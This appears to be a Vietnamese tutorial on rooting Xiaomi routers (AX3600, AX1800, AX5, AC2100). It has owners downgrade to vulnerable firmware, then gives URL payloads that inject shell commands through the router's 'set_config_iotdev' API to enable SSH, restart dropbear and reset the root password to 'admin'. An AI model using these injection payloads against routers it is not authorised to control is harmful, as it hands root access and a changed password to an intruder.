0. Phiên bản Firmware tồn tại lỗ hổng
| Model | Version |
| AX3600 | 1.0.17 - |
| AX1800 | 1.0.34 - / 1.0.328 - / 1.0.336 - |
| AX5 | 1.0.16 - / 1.0.26 - |
| AC2100 | 2.0.722 - |
1. Downgrade Firmware
- Để OpenSSH, trước tiên phải Hạ cấp FW xuống phiên bản thấp hơn để lợi dụng lỗ hổng của FW.
- Đăng nhập trang quản lý Router > Downgrade về phiên bản tồn tại lỗ hổng đã nêu ở mục
0
screenshot
- Router sẽ tự reboot sau khi Downgrade
- Đăng nhập trang quản lý Router > Downgrade về phiên bản tồn tại lỗ hổng đã nêu ở mục
0
2. OpenSSH
- Sau khi router Reboot, đăng nhập vào lại trang quản lý router. Để ý URL sẽ có dạnghttp://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/web/home#router
- Chỉnh sửa lại phần sau của URL tương tự như sau (để nguyên phần stok=xxx)http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B
- Nhấn Enter, màn hình hiện
{"code":0}thì tiến hành bước 2.http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
Đăng nhập SSH với username là root
- Lấy mật khẩu root qua số SN
Nhập vào mã SN có dạng: 12345/A1BC23456 vào trường bên dưới và nhấn Calculate
SN phân biệt chữ HOA chữ thường và không chứa khoảng trắng (dấu cách)
Nhấn nút Copy để sao chép Password được tạo.
- Hoặc chạy URL để đổi mật khẩu root thành admin (root/admin)http://192.168.31.1/cgi-bin/luci/;stok=d2d55f6e595e236044bfff0b444e2c51/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
Nguồn tham khảo:
https://www.right.com.cn/
-
Mọi thắc mắc vui lòng để lại bình luận
Chúc các bạn thành công